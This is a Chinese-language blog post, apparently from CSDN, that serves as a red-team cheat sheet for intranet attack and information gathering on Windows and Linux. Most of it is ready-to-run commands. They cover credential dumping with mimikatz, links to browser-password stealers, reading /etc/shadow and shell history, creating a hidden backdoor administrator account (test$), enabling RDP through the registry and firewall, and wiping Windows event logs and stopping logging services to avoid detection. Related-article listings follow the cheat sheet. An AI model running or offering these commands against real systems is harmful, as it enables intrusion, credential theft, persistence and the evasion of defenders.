内网攻击思路流程与信息收集

于 2024-09-29 19:39:56 发布
阅读量460 收藏 5
点赞数 12
分类专栏: 红队笔记 文章标签: web安全 网络 内网安全 信息收集
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ubaichu/article/details/142642039
版权

菜单

win信息收集

主机信息搜集

主机IP信息

ipconfig /all

主机路由信息

route print

ARP缓存信息

arp -a

DNS缓存信息

ipconfig /displaydns

Host⽂件信息

type C:\Windows\System32\drivers\etc\hosts

端⼝连接信息

netstat -ano

进程相关信息

tasklist /svc

AV防护信息

wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduc

配置信息搜集

web信息

查看配置文件,获得数据库账号密码等
进一步横向、提权等

⽂档信息

列出所有这些后缀的文档

dir /a /s /b c:\*.xls
dir /a /s /b c:\*.doc

微信信息

dir /s /b c:\"WeChat Files"

⽹络资产搜集

https://github.com/shadow1ng/fscan
https://github.com/lcvvvv/kscan
https://github.com/zhzyker/dismap

原则:

  1. 安静
  2. 不被发现
  3. 尽量⽤正常的协议
  4. 尽量⽤改造过的⼯具

密码凭证搜集

主机密码

logonpasswords
hashdump
mimikatz's sekurlsa::logonpasswords

浏览器密码

https://github.com/QAX-A-Team/BrowserGhost
https://github.com/moonD4rk/HackBrowserData

⽂档密码

dir /a /s /b c:\*.xls
dir /a /s /b c:\*.doc
dir /a /s /b d:\*.xls
dir /a /s /b d:\*.doc

⽤户操作相关

当前⽤户

whoami

在线⽤户

query user

激活Guest

net user guest /active:yes
net user guest P@ssw0rd123
net localgroup administrators guest /add
net localgroup administrators

激活administrator

net user Administrator /active:yes
net user Administrator P@ssw0rd123

创建后⻔⽤户

net user test$ P@ssw0rd123 /add
net localgroup administrators test$ /add
net localgroup administrators

RDP操作相关

查看RDP端⼝

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStation
s\RDP-Tcp" /v PortNumber

开放RDP服务

reg add "HKLM\SYSTEM\CurrentControlSet\control\Terminal Server" /v fDenyTSC
onnections /d 0 /t REG_DWORD /f

开放RDP端⼝

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=
in localport=3389 action=allow

⽇志痕迹相关

wevtutil cl "windows powershell"
wevtutil cl "security"
wevtutil cl "system"
wevtutil cl "Application"

sc stop Schedule
sc stop wecsvc
sc stop eventlog

Linux信息收集

主机信息搜集

whoami ⽤户信息
uname -a 打印所有可⽤的系统信息
uname -r 内核版本
uname -n 系统主机名。
uname -m 查看系统内核架构(64位/32位)
hostname 系统主机名
lsb_release -a 发⾏版信息
cat /proc/version 内核信息
cat /etc/passwd
cat /etc/shadow
cat /etc/group
lastlog
last
⽹络信息搜集
ip addr s
ifconfig
netstat -anptl
进程信息搜集
ps -ef 
计划任务搜集
crontab -l
ls /etc/cron*
操作记录搜集
history
cat /root/.bash_history
web信息搜集
web路径
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/apache/php/php.ini
/bin/php.ini
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/php.ini
/etc/init.d/httpd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/phpmyadmin/config.inc.php
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/home/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/NetServer/bin/stable/apache/php.ini
/opt/www/conf/httpd.conf
/opt/xampp/etc/php.ini
/PHP/php.ini
/php/php.ini
/php4/php.ini
/php5/php.ini
/usr/lib/php.ini
/etc/nginx/nginx.conf
/usr/lib/php/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/usr/local/etc/php.ini
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/php5.ini
/usr/local/share/examples/php/php.ini
/usr/local/share/examples/php4/php.ini
/usr/local/Zend/etc/php.ini
/var/apache2/config.inc
/var/httpd/conf/httpd.conf
/var/httpd/conf/php.ini
/var/httpd/conf/php.ini
/var/local/www/conf/httpd.conf
/var/local/www/conf/php.ini
/var/www/conf/httpd.conf
/web/conf/php.ini
/www/conf/httpd.conf
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf

数据库路径

/etc/init.d/mysql
/etc/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/usr/local/mysql/bin/mysql
/usr/local/mysql/my.cnf
/usr/share/mysql/my.cnf

cs插件

巨⻰拉冬:
https://github.com/k8gege/Aggressor
taowu:
https://github.com/pandasec888/taowu-cobalt_strike

白初&
关注
专栏目录
内网攻击总结.docx
04-08
综上所述,内网攻击涉及多个环节和技术手段,从初步的信息收集到最终的日志清理,每个步骤都需要精心策划和执行。对于网络安全防御而言,了解这些攻击手法有助于更好地设计和实施防护措施,减少潜在威胁。
内网渗透经典文集
03-03
"域内网中的信息收集之一内网结构的探测.pdf"强调了信息收集的重要性,这通常是渗透测试的第一步,包括网络拓扑图、设备配置、用户信息等的搜集。 最后,"内网渗透的常用手法.pdf"可能列出了各种常见的渗透技术,如...
安全等级网络安全防护体系研究与设计.docx
05-21
- 物理隔离:例如军事网络、党政内网及军工企业内网,它们与外界网络无任何物理连接。 - 逻辑隔离:如电力网、银行专网等,虽然与外界网络有物理连接,但通过密码学技术和安全设备实现隔离。 2. **网络规模特性**...
XX支队20xx年度网络攻防演练方案
07-20
#### 攻击思路 根据以往的攻防经验,攻击者通常会遵循一套标准流程来进行攻击: 1. **信息收集**:这一阶段攻击者会尽可能多地收集目标系统的相关信息,包括但不限于域名、公开资料、社交媒体信息等。 2. **外围...
渗透测试及攻防演练PDF.pdf
09-09
攻防演练项目实施包括攻防演练项目实施介绍、安全调查、交流、预演、演练实施、资产调查、安全状况调查、人员、组织和管理状况调查、技术性安全保障措施调查、演练风险预测与分析交流、防范意识培训、黑客攻击思路...
网络安全详解
weidl001的博客
09-21 1504
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
网络安全全方略
AI逍遥子
09-25 1291
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
信息安全工程师(24)网络安全体系建设原则与安全策略
最新发布
m0_73399576的博客
09-28 803
信息安全工程师——网络安全体系建设原则与安全策略篇
Linux 网络安全守护:构建安全防线的最佳实践
weixin_62641226的博客
09-23 1018
通过定期更新系统、强化用户权限管理、配置防火墙、使用SSH安全连接、定期备份数据、监控系统日志以及安装安全工具,用户可以有效提升Linux系统的安全性,构建坚固的网络安全防线。Linux系统通常内置了防火墙工具,如`iptables`和`firewalld`。用户应根据实际需求,设置合适的规则,限制不必要的端口和服务。可以使用`rsync`、`tar`等工具进行备份,确保在发生安全事件时能够快速恢复。此外,定期审查用户账户和权限,及时删除不再使用的账户,确保只有必要的用户能够访问系统。
Web安全-SQL注入之联合查询注入
m0_60984906的博客
09-25 333
Web安全SQL注入之联合查询注入墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符型)
网络安全网络基础第一阶段——第三节:网络协议基础---- VLAN、Trunk与三层交换技术
goldfish8848的博客
09-25 855
交换机(Switch)是一种基于帧的目的地址过滤、转发或泛洪的网络设备,也被称为多端口网桥。它工作在OSI模型的第二层(数据链路层),主要处理以太网帧的转发。想象一下,你在一个繁忙的邮局工作。邮局里有很多信箱,每个信箱都有一个特定的编号,就像网络中的每个设备都有一个独一无二的MAC地址。你的工作是确保每封信都能准确无误地送到正确的信箱。分拣信件:当一封信寄到邮局时,你会查看信封上的地址(在网络中就是MAC地址),然后决定把它放到哪个信箱里。这就是交换机的“帧转发”功能。记住地址。
等保测评实战:构建企业网络安全的铜墙铁壁
w13359990065的博客
09-25 651
通过深度理解等保测评要求,构建多层次防御体系,强化安全监测与响应,以及培养全员参与的安全文化,企业能够有效提升网络安全防护能力,确保业务的连续性和数据的安全。通过等保测评实战,企业不仅能够构建稳固的网络安全防线,更能在竞争中展现出强大的信息安全竞争力,为企业的长远发展提供坚实的安全保障。企业应将这一过程视为信息安全体系建设的契机,通过持续的努力和改进,构建稳固的信息安全防线,为企业的长远发展提供坚实的安全保障。:深入理解等保测评中的风险评估方法,识别企业内部与外部的安全风险,制定应对策略。
网络安全网络基础第一阶段——第四节:网络协议基础---- VRRP与网络架构设计
goldfish8848的博客
09-25 848
终端设备访问不同网段设备的时候,必须经过网关。如果只有1个网关,那么网络就存在 单点故障,所以为了避免单点故障导致网络的通信中断, 所以,我们建议在一个网段中,可以同时添加多个网关,从而增加网关的冗余性和网络的可靠性;但是,多网关的部署会带来其他的问题:一是网关IP地址冲突,二是终端用户需要频繁的切换网关IP地址。针对上述两个问题,我们提出:在同网段的多个网关之间运行VRRP,形成1个虚拟网关,终端用户都配置和使用虚拟网关就可以了想象一下,你正在家里上网,你的电脑需要通过一个路由器来连接到互联网。
网络安全:构建数字世界的坚固防线
shiming8879的博客
09-23 1164
网络安全,简而言之,是指通过采取一系列技术和管理措施,保护网络系统中的硬件、软件及其数据免受未经授权的访问、使用、泄露、中断、修改或破坏,从而确保网络服务的连续性、可用性和完整性。它涵盖了物理安全、系统安全、数据安全、应用安全、管理安全等多个层面,是一个综合性的安全体系。
15、网络安全合规由来与要素
weixin_43263566的博客
09-26 529
指服从、顺从和遵从的行为,强调使公司的经营活动与法律、监管及内部规则保持一致。合规涉及公司适应法律法规及社会规范等规则的经营行为。这一规定反映了合规在金融行业中的重要性,旨在确保银行在运营中遵循法律法规,维护金融系统的稳定与透明。1998年9月,巴塞尔银行监管委员会在《银行业组织内部控制体系框架》中,将“合法性和合规性”列为银行内部控制框架的重要要素之一。
网络安全知识:灾难恢复计划简介
qq_51301115的博客
09-24 565
灾难恢复 (DR) 计划包括一组明确的准则和详细说明,说明如何在灾难之前、期间和之后采取行动,以尽量减少灾难对组织的负面影响,并恢复关键任务运营。一般来说,基本的灾难恢复计划应包括以下组成部分:恢复目标、事件报告、行动响应和恢复程序。请注意,每个灾难恢复计划都是独一无二的,因为它考虑了自定义业务需求、恢复目标和特定组织的系统漏洞。除了灾难恢复计划之外,还需要有灾难恢复清单。灾难恢复清单包括在造成任何严重损害之前快速恢复业务运营应采取的步骤。
2024年三个月网络安全(黑客技术)入门教程
2401_85027336的博客
09-25 1429
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-25 1118
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全(黑客)——自学2024
2401_84466325的博客
09-26 1110
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值